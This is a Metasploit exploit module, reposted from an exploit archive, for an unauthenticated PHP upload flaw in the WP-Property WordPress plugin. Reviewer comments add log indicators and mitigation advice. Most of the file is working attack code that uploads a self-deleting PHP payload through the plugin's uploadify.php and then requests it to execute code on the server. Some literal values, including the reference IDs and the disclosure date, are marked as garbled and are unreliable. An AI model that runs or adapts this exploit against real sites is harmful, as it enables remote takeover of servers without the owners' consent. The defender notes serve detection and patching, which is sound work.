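# WordPress WP-Property PHP File Upload Vulnerability

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

# NOTE(review): this listing was restored from a whitespace- and case-mangled
# paste. Layout and framework identifiers were repaired; literal values (paths,
# reference IDs, dates, the boundary regex) are reproduced as printed on the
# page and may not match the upstream module.
#
# Defender summary, from what the module itself shows:
#   * Affected: WP-Property plugin <= 1.35.0 (per the module description).
#   * Root cause: the plugin's bundled uploadify.php accepts a file upload
#     without authentication and stores it under a web-served directory, so
#     an uploaded .php file is executed by the server.
#   * Log indicators: a multipart POST to
#     wp-content/plugins/wp-property/third-party/uploadify.php carrying the
#     form fields "Filedata" and "folder", followed by a GET for a .php file
#     with a five-letter random name under .../third-party/uploadify/.
#   * The payload is requested with :unlink_self => true, so the dropped file
#     may no longer be on disk afterwards; rely on web-server access logs
#     rather than a file-system sweep alone.
#   * Mitigation: update the plugin to a release later than 1.35.0, remove or
#     block direct access to the uploadify script, and deny PHP execution in
#     plugin upload/temp directories.

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers module metadata and the TARGETURI option (base path of the
  # WordPress install, default '/wordpress').
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      # NOTE(review): the '123' IDs and the disclosure date below are as
      # printed on this page and look garbled; confirm them against the
      # linked advisory before relying on them.
      'References'     =>
        [
          ['OSVDB', '123'],
          ['BID', '123'],
          ['EDB', '123'],
          ['URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          ['Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' }],
          ['Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' }]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'mar 26 123456'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Presence check only: requests the uploadify script and reports Appears on
  # an HTTP 200, Unknown on no response or any other status. It does not
  # inspect the plugin version, so a 200 here is not proof of exposure.
  def check
    uri = target_uri.path
    uri << '/' if uri[-1, 1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  # Sends the multipart upload, expects the response body to contain the
  # uploaded file name, then requests the path the server returned.
  # Fails with UnexpectedReply when the upload response is missing, is not a
  # 200, or does not mention the file name.
  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1, 1] != '/'

    peer = "#{rhost}:#{rport}"

    # Five random letters plus .php; this is the name that shows up in the
    # upload request and in the follow-up GET.
    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self => true)

    # Two form parts: the file itself ("Filedata") and the destination
    # directory ("folder").
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Boundary clean-up pattern reproduced as printed on the page.
    post_data = data.to_s.gsub(/^\r\n\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The upload response body is used as the path of the stored file.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end

# Poster's note: Don't ask me what I wrote here. How can I use it? I mean msf.
# From: http://www.exploit-db.com/exploits/23651/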